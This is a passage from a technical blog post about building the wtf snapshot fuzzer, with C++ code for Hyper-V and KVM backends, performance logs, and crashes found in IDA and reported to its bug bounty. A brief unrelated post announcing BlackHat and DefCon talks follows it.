To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and track dirtiness when receiving a memory fault doing a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once fixed, I noticed that WHvTranslateGva also was slower than I expected. This is why I also emulated its behavior by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance over bochscpu. I honestly was a bit disappointed as I expected more of a 100x performance increase but I guess it was still a significant perf increase:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure.

I didn't know anything about those VMM but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. The KVM API powers Firecracker that is a project creating micro vms to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of this project.

KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of the guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == nullptr) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}

On-demand paging

Implementing on demand paging with KVM was very easy. It uses userfaultfd and so you can just start a thread that polls and that services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the pool fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When the hardware supports it, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work you have to program the APIC a little bit and I remember struggling to get the interruption fired. I am still not 100% sure that I got the details fully right but the interruption triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer.

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had available SKUs with nested virtualization on. I rented one of them to try it out and the hardware didn't support this VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be here and so I didn't use Azure either.

Instead, I rented a bare-metal server on vultr for about 100$ / mo. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz which seemed good enough for my usage. The hardware had a PMU and that is where I developed the support for it in wtf as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case used generated executions of around 195 millions instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELF possible. I built this corpus made of 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generate execution traces that eventually get merged together but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can see the clients are runners that send back results to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereference, stack-overflows, division by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.

bounty.png

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

elf64.png

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend for you to try out their bounty as I am sure there's a lot to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

My talks @ BlackHat 2021 and DefCon29

By: pi3
3 July 2021 at 20:59

This year I’m going to present some amazing research on:

Both of them are really unusual and interesting topics 😉

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam

❌
❌